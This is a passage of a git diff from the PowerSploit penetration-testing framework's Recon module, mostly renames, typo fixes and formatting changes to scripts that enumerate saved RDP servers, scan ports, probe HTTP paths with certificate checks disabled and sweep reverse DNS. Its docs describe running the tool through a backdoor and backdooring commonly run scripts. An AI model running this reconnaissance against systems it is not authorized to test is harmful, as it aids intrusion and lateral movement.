PSObject -Property $Properties - $ReturnInfo.Add($Key, $Item) - } - else - { - $ReturnInfo[$Key].Count++ - $ReturnInfo[$Key].Times += ,$Log.TimeCreated - } - } - } - - return $ReturnInfo -} - - -Function Find-RDPClientConnections -{ -<# -.SYNOPSIS - -Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user -usually RDP's to. - -Function: Find-RDPClientConnections -Author: Joe Bialek, Twitter: @JosephBialek -Required Dependencies: None -Optional Dependencies: None - -.DESCRIPTION - -Search the registry to find saved RDP client connections. This shows you what connections an RDP client has remembered, indicating what servers the user -usually RDP's to. - -.EXAMPLE - -Find-RDPClientConnections -Find unique saved RDP client connections. - -.NOTES - -.LINK - -Blog: http://clymb3r.wordpress.com/ -Github repo: https://github.com/clymb3r/PowerShell -#> - $ReturnInfo = @{} - - New-PSDrive -Name HKU -PSProvider Registry -Root Registry::HKEY_USERS | Out-Null - - #Attempt to enumerate the servers for all users - $Users = Get-ChildItem -Path "HKU:\" - foreach ($UserSid in $Users.PSChildName) - { - $Servers = Get-ChildItem "HKU:\$($UserSid)\Software\Microsoft\Terminal Server Client\Servers" -ErrorAction SilentlyContinue - - foreach ($Server in $Servers) - { - $Server = $Server.PSChildName - $UsernameHint = (Get-ItemProperty -Path "HKU:\$($UserSid)\Software\Microsoft\Terminal Server Client\Servers\$($Server)").UsernameHint - - $Key = $UserSid + "::::" + $Server + "::::" + $UsernameHint - - if (!$ReturnInfo.ContainsKey($Key)) - { - $SIDObj = New-Object System.Security.Principal.SecurityIdentifier($UserSid) - $User = ($SIDObj.Translate([System.Security.Principal.NTAccount])).Value - - $Properties = @{ - CurrentUser = $User - Server = $Server - UsernameHint = $UsernameHint - } - - $Item = New-Object PSObject -Property $Properties - $ReturnInfo.Add($Key, $Item) - } - } - } - - return $ReturnInfo -} diff --git a/Recon/Get-HttpStatus.ps1 b/Recon/Get-HttpStatus.ps1 index 8b60306..b271efd 100644 --- a/Recon/Get-HttpStatus.ps1 +++ b/Recon/Get-HttpStatus.ps1 @@ -5,11 +5,11 @@ function Get-HttpStatus Returns the HTTP Status Codes and full URL for specified paths. -PowerSploit Function: Get-HttpStatus -Author: Chris Campbell (@obscuresec) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None +PowerSploit Function: Get-HttpStatus +Author: Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION @@ -42,7 +42,7 @@ C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL .NOTES HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error - + .LINK http://obscuresecurity.blogspot.com @@ -64,49 +64,54 @@ http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html [Switch] $UseSSL ) - + if (Test-Path $Path) { - + if ($UseSSL -and $Port -eq 0) { # Default to 443 if SSL is specified but no port is specified $Port = 443 - } elseif ($Port -eq 0) { + } + elseif ($Port -eq 0) { # Default to port 80 if no port is specified $Port = 80 } - + $TcpConnection = New-Object System.Net.Sockets.TcpClient Write-Verbose "Path Test Succeeded - Testing Connectivity" - + try { # Validate that the host is listening before scanning $TcpConnection.Connect($Target, $Port) - } catch { + } + catch { Write-Error "Connection Test Failed - Check Target" $Tcpconnection.Close() - Return + Return } - + $Tcpconnection.Close() - } else { + } + else { Write-Error "Path Test Failed - Check Dictionary Path" Return } - + if ($UseSSL) { $SSL = 's' # Ignore invalid SSL certificates [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True } - } else { + } + else { $SSL = '' } - + if (($Port -eq 80) -or ($Port -eq 443)) { $PortNum = '' - } else { + } + else { $PortNum = ":$Port" } - + # Check Http status for each entry in the doctionary file foreach ($Item in Get-Content $Path) { @@ -117,24 +122,23 @@ http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html $WebRequest = [System.Net.WebRequest]::Create($URI) $WebResponse = $WebRequest.GetResponse() $WebStatus = $WebResponse.StatusCode - $ResultObject += $ScanObject $WebResponse.Close() - } catch { + } + catch { $WebStatus = $Error[0].Exception.InnerException.Response.StatusCode - - if ($WebStatus -eq $null) { + + if (-not $WebStatus) { # Not every exception returns a StatusCode. # If that is the case, return the Status. $WebStatus = $Error[0].Exception.InnerException.Status } - } - + } + $Result = @{ Status = $WebStatus; URL = $WebTarget} - + $ScanObject = New-Object -TypeName PSObject -Property $Result - + Write-Output $ScanObject - } } diff --git a/Recon/Invoke-Portscan.ps1 b/Recon/Invoke-Portscan.ps1 index 6f059e2..7e28709 100644 --- a/Recon/Invoke-Portscan.ps1 +++ b/Recon/Invoke-Portscan.ps1 @@ -5,11 +5,11 @@ function Invoke-Portscan Simple portscan module -PowerSploit Function: Invoke-Portscan -Author: Rich Lundeen (http://webstersProdigy.net) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None +PowerSploit Function: Invoke-Portscan +Author: Rich Lundeen (http://webstersProdigy.net) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION @@ -114,7 +114,7 @@ Force Overwrite if output Files exist. Otherwise it throws exception .EXAMPLE -C:\PS> Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50 +Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50 Description ----------- @@ -122,7 +122,7 @@ Scans the top 50 ports for hosts found for webstersprodigy.net,google.com, and m .EXAMPLE -C:\PS> echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080" +echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080" Description ----------- @@ -130,7 +130,7 @@ Does a portscan of "webstersprodigy.net", and writes a greppable output file .EXAMPLE -C:\PS> Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet +Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet Description ----------- @@ -141,7 +141,13 @@ Scans the top 20 ports for hosts found in the 192.168.1.1/24 range, outputs all http://webstersprodigy.net #> - [CmdletBinding()]Param ( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseSingularNouns', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseLiteralInitializerForHashtable', '')] + [CmdletBinding()] + Param ( #Host, Ports [Parameter(ParameterSetName="cmdHosts", @@ -748,9 +754,9 @@ http://webstersprodigy.net #TODO deal with output Write-PortscanOut -comment $startMsg -grepStream $grepStream -xmlStream $xmlStream -readableStream $readableStream - #converting back from int array gives some argument error checking - $sPortList = [string]::join(",", $portList) - $sHostPortList = [string]::join(",", $hostPortList) + # #converting back from int array gives some argument error checking + # $sPortList = [string]::join(",", $portList) + # $sHostPortList = [string]::join(",", $hostPortList) ######## #Port Scan Code - run on a per host basis @@ -840,7 +846,6 @@ http://webstersprodigy.net $sockets[$p] = new-object System.Net.Sockets.TcpClient } - $scriptBlockAsString = @" #somewhat of a race condition with the timeout, but I don't think it matters @@ -885,8 +890,7 @@ http://webstersprodigy.net $timeouts[$p].Enabled = $true $myscriptblock = [scriptblock]::Create($scriptBlockAsString) - $x = $sockets[$p].beginConnect($h, $p,(New-ScriptBlockCallback($myscriptblock)) , $null) - + $Null = $sockets[$p].beginConnect($h, $p,(New-ScriptBlockCallback($myscriptblock)) , $null) } function PortScan-Alive diff --git a/Recon/Invoke-ReverseDnsLookup.ps1 b/Recon/Invoke-ReverseDnsLookup.ps1 index 5e811ee..36e6398 100644 --- a/Recon/Invoke-ReverseDnsLookup.ps1 +++ b/Recon/Invoke-ReverseDnsLookup.ps1 @@ -5,23 +5,23 @@ function Invoke-ReverseDnsLookup Perform a reverse DNS lookup scan on a range of IP addresses. -PowerSploit Function: Invoke-ReverseDnsLookup -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None - +PowerSploit Function: Invoke-ReverseDnsLookup +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + .DESCRIPTION -Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records. This script is useful for performing DNS reconnaisance prior to conducting an authorized penetration test. - +Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records. This script is useful for performing DNS reconnaissance prior to conducting an authorized penetration test. + .PARAMETER IPRange Specifies the IP address range. The range provided can be in the form of a single IP address, a low-high range, or a CIDR range. Comma-delimited ranges may can be provided. - + .EXAMPLE -C:\PS> Invoke-ReverseDnsLookup 74.125.228.0/29 +Invoke-ReverseDnsLookup 74.125.228.0/29 IP HostName -- -------- @@ -31,29 +31,29 @@ IP HostName 74.125.228.4 iad23s05-in-f4.1e100.net 74.125.228.5 iad23s05-in-f5.1e100.net 74.125.228.6 iad23s05-in-f6.1e100.net - + Description ----------- Returns the hostnames of the IP addresses specified by the CIDR range. - + .EXAMPLE -C:\PS> Invoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6' - +Invoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6' + IP HostName -- -------- 74.125.228.1 iad23s05-in-f1.1e100.net 74.125.228.4 iad23s05-in-f4.1e100.net 74.125.228.5 iad23s05-in-f5.1e100.net 74.125.228.6 iad23s05-in-f6.1e100.net - + Description ----------- Returns the hostnames of the IP addresses specified by the IP range specified. .EXAMPLE -PS C:\> Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup +Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup IP HostName -- -------- @@ -69,13 +69,15 @@ Description ----------- Returns the hostnames of the IP addresses piped from another source. - .LINK http://www.exploit-monday.com https://github.com/mattifestation/PowerSploit #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')] + [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True,ValueFromPipeline=$True)] [String] @@ -83,14 +85,14 @@ https://github.com/mattifestation/PowerSploit ) BEGIN { - + function Parse-IPList ([String] $IpRange) { - + function IPtoInt { Param([String] $IpString) - + $Hexstr = "" $Octets = $IpString.Split(".") foreach ($Octet in $Octets) { @@ -98,7 +100,7 @@ https://github.com/mattifestation/PowerSploit } return [Convert]::ToInt64($Hexstr, 16) } - + function InttoIP { Param([Int64] $IpInt) @@ -110,15 +112,15 @@ https://github.com/mattifestation/PowerSploit } return $IpStr.TrimEnd('.') } - + $Ip = [System.Net.IPAddress]::Parse("127.0.0.1") - + foreach ($Str in $IpRange.Split(",")) { $Item = $Str.Trim() $Result = "" $IpRegex = "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}" - + # First, validate the input switch -regex ($Item) { @@ -139,11 +141,11 @@ https://github.com/mattifestation/PowerSploit } default { - Write-Warning "Inproper input" + Write-Warning "Improper input" return } } - + #Now, start processing the IP addresses switch ($Result) { @@ -152,14 +154,14 @@ https://github.com/mattifestation/PowerSploit $CidrRange = $Item.Split("/") $Network = $CidrRange[0] $Mask = $CidrRange[1] - + if (!([System.Net.IPAddress]::TryParse($Network, [ref] $Ip))) { Write-Warning "Invalid IP address supplied!"; return} if (($Mask -lt 0) -or ($Mask -gt 30)) { Write-Warning "Invalid network mask! Acceptable values are 0-30"; return} - + $BinaryIP = [Convert]::ToString((IPtoInt $Network),2).PadLeft(32,'0') #Generate lower limit (Excluding network address) $Lower = $BinaryIP.Substring(0, $Mask) + "0" * ((32-$Mask)-1) + "1" - #Generate upperr limit (Excluding broadcast address) + #Generate upper limit (Excluding broadcast address) $Upper = $BinaryIP.Substring(0, $Mask) + "1" * ((32-$Mask)-1) + "0" $LowerInt = [Convert]::ToInt64($Lower, 2) $UpperInt = [Convert]::ToInt64($Upper, 2) @@ -168,21 +170,21 @@ https://github.com/mattifestation/PowerSploit "range" { $Range = $item.Split("-") - + if ([System.Net.IPAddress]::TryParse($Range[0],[ref]$Ip)) { $Temp1 = $Ip } else { Write-Warning "Invalid IP address supplied!"; return } - + if ([System.Net.IPAddress]::TryParse($Range[1],[ref]$Ip)) { $Temp2 = $Ip } else { Write-Warning "Invalid IP address supplied!"; return } - + $Left = (IPtoInt $Temp1.ToString()) $Right = (IPtoInt $Temp2.ToString()) - + if ($Right -gt $Left) { for ($i = $Left; $i -le $Right; $i++) { InttoIP $i } } else { Write-Warning "Invalid IP range. The right portion must be greater than the left portion."; return} - + break } "single" @@ -193,28 +195,30 @@ https://github.com/mattifestation/PowerSploit } default { - Write-Warning "An error occured." + Write-Warning "An error occurred." return } } } - } } - + PROCESS { Parse-IPList $IpRange | ForEach-Object { try { Write-Verbose "Resolving $_" $Temp = [System.Net.Dns]::GetHostEntry($_) - + $Result = @{ IP = $_ HostName = $Temp.HostName } - + New-Object PSObject -Property $Result - } catch [System.Net.Sockets.SocketException] {} + } + catch [System.Net.Sockets.SocketException] { + Write-Verbose "Error: $_" + } } } } diff --git a/Recon/PowerView.ps1 b/Recon/PowerView.ps1 index eecf62f..49ee9c7 100755 --- a/Recon/PowerView.ps1 +++ b/Recon/PowerView.ps1 @@ -859,7 +859,7 @@ function Export-PowerViewCSV { <# .SYNOPSIS -Converts objects into a series of comma-separated (CSV) strings and saves the +Converts objects into a series of comma-separated (CSV) strings and saves the strings in a CSV file in a thread-safe manner. Author: Will Schroeder (@harmj0y) diff --git a/Recon/Recon.psd1 b/Recon/Recon.psd1 index 71667c0..d0a4148 100644 --- a/Recon/Recon.psd1 +++ b/Recon/Recon.psd1 @@ -98,7 +98,7 @@ FunctionsToExport = @( 'Get-DomainForeignUser', 'Get-DomainForeignGroupMember', 'Get-DomainTrustMapping', - 'Get-ComputerDetails', + 'Get-ComputerDetail', 'Get-HttpStatus', 'Invoke-Portscan', 'Invoke-ReverseDnsLookup' diff --git a/docs/Recon/Export-PowerViewCSV.md b/docs/Recon/Export-PowerViewCSV.md index 1597249..d2d2a89 100755 --- a/docs/Recon/Export-PowerViewCSV.md +++ b/docs/Recon/Export-PowerViewCSV.md @@ -1,7 +1,7 @@ # Export-PowerViewCSV ## SYNOPSIS -Converts objects into a series of comma-separated (CSV) strings and saves the +Converts objects into a series of comma-separated (CSV) strings and saves the strings in a CSV file in a thread-safe manner. Author: Will Schroeder (@harmj0y) diff --git a/docs/Recon/Get-ComputerDetail.md b/docs/Recon/Get-ComputerDetail.md new file mode 100755 index 0000000..15a3feb --- /dev/null +++ b/docs/Recon/Get-ComputerDetail.md @@ -0,0 +1,68 @@ +# Get-ComputerDetail + +## SYNOPSIS +This script is used to get useful information from a computer. + +Function: Get-ComputerDetail +Author: Joe Bialek, Twitter: @JosephBialek +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Get-ComputerDetail [-ToString] +``` + +## DESCRIPTION +This script is used to get useful information from a computer. +Currently, the script gets the following information: +-Explicit Credential Logons (Event ID 4648) +-Logon events (Event ID 4624) +-AppLocker logs to find what processes are created +-PowerShell logs to find PowerShell scripts which have been executed +-RDP Client Saved Servers, which indicates what servers the user typically RDP's in to + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ComputerDetail +``` + +Gets information about the computer and outputs it as PowerShell objects. + +Get-ComputerDetail -ToString +Gets information about the computer and outputs it as raw text. + +## PARAMETERS + +### -ToString +Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to. +You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files. + +## RELATED LINKS + +[Blog: http://clymb3r.wordpress.com/ +Github repo: https://github.com/clymb3r/PowerShell](Blog: http://clymb3r.wordpress.com/ +Github repo: https://github.com/clymb3r/PowerShell) + diff --git a/docs/Recon/Get-ComputerDetails.md b/docs/Recon/Get-ComputerDetails.md deleted file mode 100755 index 6bc3e91..0000000 --- a/docs/Recon/Get-ComputerDetails.md +++ /dev/null @@ -1,68 +0,0 @@ -# Get-ComputerDetails - -## SYNOPSIS -This script is used to get useful information from a computer. - -Function: Get-ComputerDetails -Author: Joe Bialek, Twitter: @JosephBialek -Required Dependencies: None -Optional Dependencies: None - -## SYNTAX - -``` -Get-ComputerDetails [-ToString] -``` - -## DESCRIPTION -This script is used to get useful information from a computer. -Currently, the script gets the following information: --Explicit Credential Logons (Event ID 4648) --Logon events (Event ID 4624) --AppLocker logs to find what processes are created --PowerShell logs to find PowerShell scripts which have been executed --RDP Client Saved Servers, which indicates what servers the user typically RDP's in to - -## EXAMPLES - -### -------------------------- EXAMPLE 1 -------------------------- -``` -Get-ComputerDetails -``` - -Gets information about the computer and outputs it as PowerShell objects. - -Get-ComputerDetails -ToString -Gets information about the computer and outputs it as raw text. - -## PARAMETERS - -### -ToString -Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor. - -```yaml -Type: SwitchParameter -Parameter Sets: (All) -Aliases: - -Required: False -Position: 1 -Default value: False -Accept pipeline input: False -Accept wildcard characters: False -``` - -## INPUTS - -## OUTPUTS - -## NOTES -This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to. -You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files. - -## RELATED LINKS - -[Blog: http://clymb3r.wordpress.com/ -Github repo: https://github.com/clymb3r/PowerShell](Blog: http://clymb3r.wordpress.com/ -Github repo: https://github.com/clymb3r/PowerShell) - diff --git a/docs/Recon/Get-HttpStatus.md b/docs/Recon/Get-HttpStatus.md index a8a7dbb..4311983 100755 --- a/docs/Recon/Get-HttpStatus.md +++ b/docs/Recon/Get-HttpStatus.md @@ -3,10 +3,10 @@ ## SYNOPSIS Returns the HTTP Status Codes and full URL for specified paths. -PowerSploit Function: Get-HttpStatus -Author: Chris Campbell (@obscuresec) -License: BSD 3-Clause -Required Dependencies: None +PowerSploit Function: Get-HttpStatus +Author: Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None Optional Dependencies: None ## SYNTAX diff --git a/docs/Recon/Invoke-Portscan.md b/docs/Recon/Invoke-Portscan.md index 49d9e32..8e1ef27 100755 --- a/docs/Recon/Invoke-Portscan.md +++ b/docs/Recon/Invoke-Portscan.md @@ -3,10 +3,10 @@ ## SYNOPSIS Simple portscan module -PowerSploit Function: Invoke-Portscan -Author: Rich Lundeen (http://webstersProdigy.net) -License: BSD 3-Clause -Required Dependencies: None +PowerSploit Function: Invoke-Portscan +Author: Rich Lundeen (http://webstersProdigy.net) +License: BSD 3-Clause +Required Dependencies: None Optional Dependencies: None ## SYNTAX diff --git a/docs/Recon/Invoke-ReverseDnsLookup.md b/docs/Recon/Invoke-ReverseDnsLookup.md index 348ad91..2c74e3c 100755 --- a/docs/Recon/Invoke-ReverseDnsLookup.md +++ b/docs/Recon/Invoke-ReverseDnsLookup.md @@ -3,10 +3,10 @@ ## SYNOPSIS Perform a reverse DNS lookup scan on a range of IP addresses. -PowerSploit Function: Invoke-ReverseDnsLookup -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None +PowerSploit Function: Invoke-ReverseDnsLookup +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None Optional Dependencies: None ## SYNTAX @@ -17,7 +17,7 @@ Invoke-ReverseDnsLookup [-IpRange] ## DESCRIPTION Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records. -This script is useful for performing DNS reconnaisance prior to conducting an authorized penetration test. +This script is useful for performing DNS reconnaissance prior to conducting an authorized penetration test. ## EXAMPLES @@ -34,7 +34,7 @@ IP HostName 74.125.228.4 iad23s05-in-f4.1e100.net 74.125.228.5 iad23s05-in-f5.1e100.net 74.125.228.6 iad23s05-in-f6.1e100.net - + Description ----------- Returns the hostnames of the IP addresses specified by the CIDR range. @@ -50,7 +50,7 @@ IP HostName 74.125.228.4 iad23s05-in-f4.1e100.net 74.125.228.5 iad23s05-in-f5.1e100.net 74.125.228.6 iad23s05-in-f6.1e100.net - + Description ----------- Returns the hostnames of the IP addresses specified by the IP range specified. diff --git a/docs/Recon/Set-DomainObject.md b/docs/Recon/Set-DomainObject.md index 482d86d..8cb283b 100755 --- a/docs/Recon/Set-DomainObject.md +++ b/docs/Recon/Set-DomainObject.md @@ -12,8 +12,7 @@ Required Dependencies: Get-DomainObject ``` Set-DomainObject [[-Identity] ] [-Set ] [-XOR ] [-Clear ] [-Domain ] [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] - [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] - [-Credential ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] ``` ## DESCRIPTION @@ -281,21 +280,6 @@ Accept pipeline input: False Accept wildcard characters: False ``` -### -SecurityMasks -{{Fill SecurityMasks Description}} - -```yaml -Type: String -Parameter Sets: (All) -Aliases: - -Required: False -Position: Named -Default value: None -Accept pipeline input: False -Accept wildcard characters: False -``` - ### -Tombstone Switch. Specifies that the searcher should also return deleted/tombstoned objects. @@ -332,14 +316,6 @@ Accept wildcard characters: False ## OUTPUTS -### PowerView.ADObject - -Custom PSObject with translated AD object property fields, if -PassThru is enabled. - -PowerView.ADObject.Raw - -The raw DirectoryServices.SearchResult object, if -PassThru and -Raw are enabled. - ## NOTES ## RELATED LINKS diff --git a/docs/Recon/index.md b/docs/Recon/index.md old mode 100644 new mode 100755 diff --git a/mkdocs.yml b/mkdocs.yml index a24f7e4..f4a0608 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -81,7 +81,7 @@ pages: - Get-DomainForeignUser: 'Recon/Get-DomainForeignUser.md' - Get-DomainForeignGroupMember: 'Recon/Get-DomainForeignGroupMember.md' - Get-DomainTrustMapping: 'Recon/Get-DomainTrustMapping.md' - - Get-ComputerDetails: 'Recon/Get-ComputerDetails.md' + - Get-ComputerDetail: 'Recon/Get-ComputerDetail.md' - Get-HttpStatus: 'Recon/Get-HttpStatus.md' - Invoke-Portscan: 'Recon/Invoke-Portscan.md' - Invoke-ReverseDnsLookup: 'Recon/Invoke-ReverseDnsLookup.md' -- cgit v1.2.3